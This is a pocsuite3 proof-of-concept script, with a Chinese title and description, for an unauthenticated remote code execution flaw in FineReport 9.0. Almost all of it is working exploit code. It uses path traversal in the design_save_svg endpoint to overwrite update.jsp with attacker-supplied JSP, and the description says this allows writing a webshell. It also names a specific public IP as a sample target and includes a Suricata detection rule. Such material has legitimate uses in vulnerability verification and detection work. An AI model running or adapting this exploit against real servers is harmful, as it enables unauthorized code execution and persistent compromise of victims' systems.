帆软 V9未授权RCE漏洞

#!usr/bin/env python # -*- coding:utf-8 -*- from urllib.parse import urljoin from pocsuite3.api import Output, POCBase, register_poc, logger, requests class DemoPOC(POCBase): vulID = '99190' # ssvid version = '1.0' author = [''] vulDate = '2021-04-08' createDate = '2021-04-08' updateDate = '2021-04-08' references = ['https://www.seebug.org/vuldb/ssvid-99190'] name = 'finereport rce' appPowerLink = 'https://fanruan.com/' appName = 'finereport' appVersion = 'FineReport 9.0' vulType = 'rce' suricata_request = '''http.method; content:"POST"; http.uri; content: "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp";''' suricata_response = '''''' desc = ''' 2021年4月8日，我们在网上监测到FineReport 未授权RCE漏洞的漏洞payload。由tomcat环境下部署的FineReport可以通过未授权任意文件覆盖掉update.jsp文件内容，导致写入webshell。 ''' samples = ['https://124.251.118.32/'] install_requires = [''] def _verify(self): result = {} self.url = self.url.rstrip('/') + '/' data = '''<html> <head> <title>aaa</title> </head> <body> <% out.println(1111111111); %> </body></html>''' vul_url = urljoin(self.url, "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp") headers = {'Content-Type': 'text/xml;charset=UTF-8', 'Accept-Au': '0c42b2f264071be0507acea1876c74'} data = '{"__CONTENT__":"' + data + '","__CHARSET__":"UTF-8"}' try: r = requests.post(vul_url, headers=headers, data=data) if 'Unresolvable Operation:svginit' not in r.text and r.status_code != 404: r = requests.get(urljoin(self.url, "/WebReport/update.jsp")) if r.status_code != 500 and '1111111111' in r.text: result['VerifyInfo'] = {} result['VerifyInfo']["URL"] = self.url except Exception as e: logger.error(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)